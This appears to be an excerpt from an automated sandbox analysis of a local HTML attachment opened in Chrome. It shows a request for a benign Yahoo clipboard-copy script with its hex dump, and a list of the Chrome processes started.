                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC374OUTGET /aaq/wf/wf-clipboard-copy-1.0.2-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC742INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: HhRnrblMZqGIzOrwhqBTxCaMCquS2HsQauIEw728BsLyGnPgqk1LnigiR8ln54mZZEqBoy3yUxA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: FBATRTK3BK6QRT4R
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 04:42:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 24 May 2021 16:40:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "9d2a8efbe3fe9705e54df41100ea2dae"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: s6ZljWUzqa9Ss0D5hEgjXb_jGlec.wYG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 4365
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 45525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-clipboard-copy",[],t):"object"==typeof exports?exports["wafer-clipboard-copy"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tion, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function c(e,t){if(!(e instanceof t))throw new TypeError(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 63 6f 70 79 2d 74 65 78 74 22 5d 2c 68 3d 5b 22 68 61 6e 64 6c 65 43 6f 70 79 22 5d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 61 3d 6f 2e 73 65 6c 65 63 74 6f 72 3b 72 28 74 68 69 73 2c 74 29 3b 76 61 72 20 63 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 73 65 6c 65 63 74 6f 72 3a 61 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 62 7d 29 29 2c 69 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: copy-text"],h=["handleCopy"],w=function(e){function t(e){var o=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},a=o.selector;r(this,t);var c=n(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{selector:a},{STATE_ATTRS:b})),i=e.getAttribut
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC465INData Raw: 65 61 3b 74 7c 7c 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 78 74 61 72 65 61 22 29 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 73 74 79 6c 65 2c 7b 62 6f 72 64 65 72 3a 22 6e 6f 6e 65 22 2c 62 6f 78 53 68 61 64 6f 77 3a 22 6e 6f 6e 65 22 2c 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 2c 68 65 69 67 68 74 3a 22 32 65 6d 22 2c 6c 65 66 74 3a 30 2c 6f 75 74 6c 69 6e 65 3a 22 6e 6f 6e 65 22 2c 70 61 64 64 69 6e 67 3a 30 2c 70 6f 73 69 74 69 6f 6e 3a 22 66 69 78 65 64 22 2c 74 6f 70 3a 30 2c 77 69 64 74 68 3a 22 32 65 6d 22 7d 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 29 2c 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 2c 74 2e 76 61 6c 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ea;t||(t=document.createElement("textarea"),Object.assign(t.style,{border:"none",boxShadow:"none",display:"none",height:"2em",left:0,outline:"none",padding:0,position:"fixed",top:0,width:"2em"}),document.body.appendChild(t)),t.style.display="block",t.valu


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Start time:13:20:12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Electronic_Receipt_ATT0001.htm"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Start time:13:20:16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2216,i,962291635718744552,10165825185328870103,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Start time:13:21:22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Start date:30/09/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=2216,i,962291635718744552,10165825185328870103,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    No disassembly